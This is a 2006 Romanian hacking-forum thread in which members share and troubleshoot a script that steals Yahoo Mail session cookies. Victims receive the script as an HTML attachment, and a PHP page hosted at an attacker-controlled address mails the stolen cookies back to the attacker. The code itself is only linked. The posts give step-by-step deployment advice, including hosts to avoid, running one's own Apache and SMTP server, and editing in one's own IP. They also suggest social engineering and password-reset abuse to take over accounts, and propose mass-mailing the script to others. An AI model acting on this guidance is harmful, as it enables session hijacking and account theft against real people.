Guest Nemessis Posted July 13, 2006 Report Posted July 13, 2006 http://www.antifrauda.evonet.ro/ycookie.txtUn script care odata trimis in inboxul cuiva trimite cookie-ul victimei in mailul vostru. Sesiunea ramane deschisa doar 24 ore de la citirea mesajului.Functioneaza numai pe Internet Explorer si nu are nici un efect pe versiunea Beta a Yahoo! mail.Pentru mai multe detalii urmariti clipul de la rubrica "Tutoriale video". Quote
Bigojey Posted July 13, 2006 Report Posted July 13, 2006 wow thank you very much m8...nice work Quote
Sad_Dreamer Posted July 13, 2006 Report Posted July 13, 2006 ma chinui de ceva timp si nu reusesc...intra ala pe pagina..mail nu vine si am editat ala ... Quote
Guest Nemessis Posted July 13, 2006 Report Posted July 13, 2006 Asigura-te ca php-ul este pus pe un server ce ii permite aceasta functie de mailer. Sunt cazuri cand iti vine cookie si cu intarziere de 1 ora (in functie de cat de bun este serverul pe care este urcat php-ul). Deasemenea asigura-te ca victima foloseste Internet Explorer altfel nu va functiona. Pune in linkul din script adresa catre php si verifica prima oara pe tine daca merge sau nu. Daca nu merge trebuie sa uploadezi php-ul pe alt hosting. Majoritatea mailurilor cu cookies se duc in bulk datorita hostingului ce este in "black list". Evitati lx.ro, evonet.ro, xhost.ro, as.ro pentru ca aceste hosting-uri nu permit php-ului sa isi faca treaba. Quote
Sad_Dreamer Posted July 13, 2006 Report Posted July 13, 2006 pe as.ro pusesem...zi si tu un host bun te rog... Quote
mario23 Posted July 13, 2006 Report Posted July 13, 2006 ma frate dar nu functioneaza, mie imi arata atasamentu ca fisier text in mailu primit. Unde e buba ?? Sau deja este patchuit si asta )) Quote
nos Posted July 13, 2006 Report Posted July 13, 2006 frate mergea dar numai merge acum iti apare codu ala dn html pisamas pe astia de la yahoo imediat se prind..... Quote
Guest Nemessis Posted July 13, 2006 Report Posted July 13, 2006 Fisierul trebuie sa fie htm sau html Quote
Guest Nemessis Posted July 13, 2006 Report Posted July 13, 2006 Doamne. Merge. NU TRIMITETI PHP. TRIMITETI DOAR SCRIPTUL PENTRU FURAT COOKIE CARE TREBUIE SA AIBA EXTENSIE HTM SAU HTML. PHP E SEPARAT SI SE URCA PE UN DOMENIU CE PERMITE SA TRIMITA MAIL CU COOKIE-URILE FURATE. Cine se va descurca bravo lui, cine nu... somn usor Quote
mario23 Posted July 13, 2006 Report Posted July 13, 2006 asa am pus frate dar din mail de la yahoo nu merge am incercat si .html si .htm si imi afiseaza ca text, dar am trimis cu AMS direct html si a mers brici deci scriptu este bun ,l-am testat si merge si din bulk. Quote
Sad_Dreamer Posted July 13, 2006 Report Posted July 13, 2006 nu am mai reusit..oricum asta e .. Quote
PsYKid Posted July 14, 2006 Report Posted July 14, 2006 now trying ..revin cu later edit! LATER EDIT: Haileeeeeeeeei rupeeeee p&&&zda ..merge ..merge MERGEEEEEEEEEEEEEEEEEE !! ..// begin sfat.txtBaieti nu va mai deschideti mailurile ...//end sfat.txt Quote
nos Posted July 14, 2006 Report Posted July 14, 2006 se poate cumva sa-i schimbam parola victimei?? Quote
PsYKid Posted July 14, 2006 Report Posted July 14, 2006 <div class='quotetop'>QUOTE("nos")</div>se poate cumva sa-i schimbam parola victimei??nu ai cum nos . Quote
ecstazy_kid Posted July 14, 2006 Report Posted July 14, 2006 Sad ! Pt ati merge trimiti pagina .php trimiti test.html ! pagina .php modifici mailurile tale cu cele care sunt acolo ! apoi o urci pe un web server ! Cel mai bine pune-o la tine in pc iatzi apache , e mai bine asea ! Apoi intri cu edit in pagina.html ! Si modifici acolo adresa http://xxx.xxx.xxx.xxx/yahoo.php?id ! Modifica xxx.xxx.xxx.xxx cu ip-ul tau apoi save & exit ! trimiti victimei ...deaci in colo sti ! p.S: Ca sa iti mearga iati SMTP pt ati binda la ip portu necesar 25 Quote
Sad_Dreamer Posted July 14, 2006 Report Posted July 14, 2006 da ma reusisem pan' la urma mersi oricum dar e nasol ca nu poti afla passu' Quote
nos Posted July 14, 2006 Report Posted July 14, 2006 baietii eu zic sa tirmitem la toata lista....in afara de hackerii de aici... Quote
mihnutzu Posted July 14, 2006 Report Posted July 14, 2006 Merge perfect... desi degeaba daca nu iti da parola Quote
Guest Nemessis Posted July 14, 2006 Report Posted July 14, 2006 Parola se afla foarte usor dupa aceea folosind social engineering. Deasemenea verificati daca are cont pe HI5 sau orice alt serviciu web ce are optiunea de "forgot password". Foarte multi au aceeasi parola si la mail si la restul aplicatiilor online. Quote
SpLo1T Posted July 14, 2006 Report Posted July 14, 2006 nemessis pune ma si u aici script`u direct configurat de tine ! ca eu nu stiu sa`l configurez !!! Quote
ghici Posted July 15, 2006 Report Posted July 15, 2006 lol BoRy .. ce sa configurezi la el? ) :@ Quote